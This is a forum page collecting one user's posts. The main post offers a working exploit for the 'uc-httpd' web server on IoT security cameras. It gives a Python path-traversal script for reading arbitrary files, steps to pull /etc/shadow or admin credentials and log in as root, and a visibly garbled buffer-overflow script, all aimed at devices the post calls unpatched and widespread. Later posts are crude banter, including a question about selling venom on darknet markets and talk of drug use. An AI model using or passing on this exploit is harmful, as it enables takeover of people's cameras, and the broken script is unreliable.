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Thanked Posts by MLT

  1. MLT Yung Blood
    So, here is an n-day expoit that we (my 0day development crew) found back in 2017 (zero-day at the time). Reposting from my github. It's still unpatched despite being four years old, with over two million vulnerable IoT devices (with remote root possible on all of them).
    The affected software is "uc-httpd" which is a web interface for a series of models of security cams. Due to the nature of this vuln, it's not possible for them to patch it without performing a mass product recall and re-writing the firmware, so currently it's still exploitable as an n-day :)
    Do not abuse this. This is only for research, nothing else. I can't be held liable for your stupidity.

    There are multiple exploits here. There is a local file disclosure and also a buffer overflow - you can generally get root via the LFD alone, so there's not really much need for the buffer overflow unless an LFD scenario fails.

    So, the LFD is sent as a direct HTTP request to the box, rather than being a vuln POST/GET param. You can generally read /etc/shadow file on the box via the LFD, which contains PLAINTEXT hashes for the root password (so you can just SSH into teh box as root from there using the plaintext pass).
    If for some reason you can't read the shadow file via the LFD, then instead you should attempt to read /mnt/mtd/Config/Account1 to get credentials from the admin interface, and then you can abuse the overflow from there to get root.

    Here you can see the results from shodan, showing that there are currently more than 1.9 million devices running this (with our more extensive scanning returning over 2.5million devices):

    LFD automated exploit code (python):

    #!/usr/bin/env python
    import urllib2, httplib, sys

    httplib.HTTPConnection._http_vsn = 10
    httplib.HTTPConnection._http_vsm_str = 'HTTP/1.0'

    print "[+] uc-httpd 0day exploiter [+]"
    print "[+] usage: python " + __file__ + " http://<target_ip>"

    host = sys.argv[1]
    fd = raw_input('[+] File or Directory: ')

    print "Exploiting....."
    print '\n'
    print urllib2.urlopen(host + '/../../../../..' + fd).read()

    It is also worth noting, that in addition to the LFD vuln... you can also supply a directory path to uc-httpd in the same manner that you'd supply the file you want to disclose... it will then output the contents of the directory to you as if you ran "ls" on that dir, so you can use that to enumerate directory contents in order to read even more files (although generally all you need to read to pop root is /etc/shadow or /mnt/mtd/Config/Account1)

    If you can't read shadow file and ssh direct into the box as root that way, then read Account1 file and use the following buffer overflow within the web interface (protip: if ASLR is enabled, you can get the relevant memory regions via reading particular proc entries through the LFD)

    Buffer Overflow automated exploit code (python):

    import mechanize, time, sys, urllib, socket

    from termcolor import colored

    print colored('uc-httpd web-daemon bufferoverflow', 'red')
    print colored('- Overwrites the stack (attach to see)', 'red')
    print colored('- Kernel watchdog module restarts Sofia after 2 minutes', 'red')

    def at_login_overflow():
    print colored('Sending payload.. ', 'red')
    s_c = "\x2f\x4c\x6f\x67\x69\x6e\x2e\x68\x74\x6d" # Page id
    x = mechanize.Browser()
    x.addheaders = [("User-agent",
    "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36")]

    login = + s_c)

    x["username"] = buffersm
    x["password"] = "mikevirushackinglimited"

    except Exception:
    print colored('Target daemon not vulnerable.', 'red')


    # Check interface status
    def check_conn():
    print colored('Checking interface status..', 'red')

    print colored('Exploit failed', 'red')
    except Exception:
    print colored('Finished.', 'red')

    tar = sys.argv[1]
    tar_p = sys.argv[2]
    buff_size = sys.argv[3]

    tar_full = "http://" + tar + ":" + tar_p

    # rec 180
    buffersm = "\x41" * int(buff_size)

    # post only

    Overwrite set shellcode:


    enjoy ;) but please don't abuse.
    The following users say it would be alright if the author of this post didn't die in a fire!
  2. MLT Yung Blood
    Originally posted by troon you got me. i can taste my own tears. i'm really not trolling you, just responding to your crap-posting and schizo outbursts. then i learned you're actually a sick individual. i had thought it was satire, or at least just for your imagination. but no.

    You're literally messaging two entirely different people you incompetent fuckwit lol
    The following users say it would be alright if the author of this post didn't die in a fire!
  3. MLT Yung Blood
    Skip the last question, how much per dose for the venom if sold via DNM? Asking for a friend
    The following users say it would be alright if the author of this post didn't die in a fire!
  4. MLT Yung Blood
    Originally posted by AngryOnion Post tits or get the fuck out.

    I'm male... so unless you wanna see some juicy man-titties ;)

    Originally posted by STER0S what drugs do you use

    In the past I've done everything from heroin to datura to ketamine.. pretty much every major drug you can think of, I've likely tried at some stage.
    These days I've calmed down a lot though. Now I only do weed and psychedelics (specifically just mushrooms and DMT). Oh, and I still drink alcohol too.
    The following users say it would be alright if the author of this post didn't die in a fire!
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